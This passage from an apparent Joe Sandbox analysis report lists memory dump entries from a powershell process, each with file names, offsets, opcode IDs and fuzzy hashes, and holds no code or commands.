                                      • Instruction Fuzzy Hash: C0713B6290EFC24FE3429B2CAC551E9BFA0FF462A4B8401FBC1D5C7093DA19641AC792
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069072259.00007FF8D19FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D19FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d19fd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c4478be963e72157d9c41fe7913b5fe06db488c253e8f461c4769d505648c6e
                                      • Instruction ID: c39902f509beba576ba30fd17d80f2e5674b596c931e685af46788515def5ff6
                                      • Opcode Fuzzy Hash: 4c4478be963e72157d9c41fe7913b5fe06db488c253e8f461c4769d505648c6e
                                      • Instruction Fuzzy Hash: 2F41287180DFC46FE7568F28A8459563FF0EF53324B1605DFD088CB1A3DA25A846C792
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7354a00fbd6a3b40fd43fd0dadf9acde9f96d43c447b5e961e8c5302f13d6fe3
                                      • Instruction ID: 31a1c04112887fad43d1be2392bfaf2b1877461b4f837f70dfb9033154f47a05
                                      • Opcode Fuzzy Hash: 7354a00fbd6a3b40fd43fd0dadf9acde9f96d43c447b5e961e8c5302f13d6fe3
                                      • Instruction Fuzzy Hash: 0E31A23191CF4C9FDB58DB4C98466A97BE0FBA9321F00422FE449D3251DB71B8568BC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f969c99cbbc61dc615666e4dc4157782e082c9b0b0bf87418285a0991bd340e
                                      • Instruction ID: e4ecdcb127328cc0b69b47b271aa8819e6424d7908a2adef4c6e87355f5b84cd
                                      • Opcode Fuzzy Hash: 7f969c99cbbc61dc615666e4dc4157782e082c9b0b0bf87418285a0991bd340e
                                      • Instruction Fuzzy Hash: B921383090CA4C4FEB68DB6C984A7E97BE0EF96331F04426FD059C31A6DA74545BCB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a9e1ec3979f52949ec3ba3e30f62314311fe11c2cf3b7948dd6ad856378f5f58
                                      • Instruction ID: 62c8b6afcd77aa7892762ef157a45f62ebfacfc2df104981f756b094b8be3783
                                      • Opcode Fuzzy Hash: a9e1ec3979f52949ec3ba3e30f62314311fe11c2cf3b7948dd6ad856378f5f58
                                      • Instruction Fuzzy Hash: 4631F63095AE4E8EFBB4AB14DC4ABFD36D1FF42355F80213AD40D86092CA786989CB51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bce0cc068c40f6a0ee7a4a359225e820c7e8998170eada5f6cef819f62286abe
                                      • Instruction ID: 06b4bd5c612304b3d927e780f9da950d3c8a12a134a2036493705dbb50df4178
                                      • Opcode Fuzzy Hash: bce0cc068c40f6a0ee7a4a359225e820c7e8998170eada5f6cef819f62286abe
                                      • Instruction Fuzzy Hash: 5921D83151CF4A4FE759DF18D455AB9BBE0FF9A310F10057EE08EC35A6DA26A882CB41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41073170728.00007FF8D1DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1DC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1dc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b003b1509aba2e4bbdb2db242153a39840e6f597c935a12a02fd1dd1acc73a1c
                                      • Instruction ID: 670dcac4b2ffd1c44b23e0571697a16a5809f1f27e85820ea7769cb19fe40bee
                                      • Opcode Fuzzy Hash: b003b1509aba2e4bbdb2db242153a39840e6f597c935a12a02fd1dd1acc73a1c
                                      • Instruction Fuzzy Hash: F9F03032A0C9554FE758EB4CE4415A877E2FF4936071800B7E14DC7567DA26AC41CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41073170728.00007FF8D1DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1DC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1dc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6994cc8c443382564813c710aecae8de7ae80cc17fad476751a039812ee8639c
                                      • Instruction ID: 8cc00d5ff1837b94c5469526869e248877b4da6b37e1e05be10aa8b7fefe352e
                                      • Opcode Fuzzy Hash: 6994cc8c443382564813c710aecae8de7ae80cc17fad476751a039812ee8639c
                                      • Instruction Fuzzy Hash: 0FF05832A0C9558FE798EB4CE4419A87BE1FF49364B1400B7E049CB563CB2AEC85DB90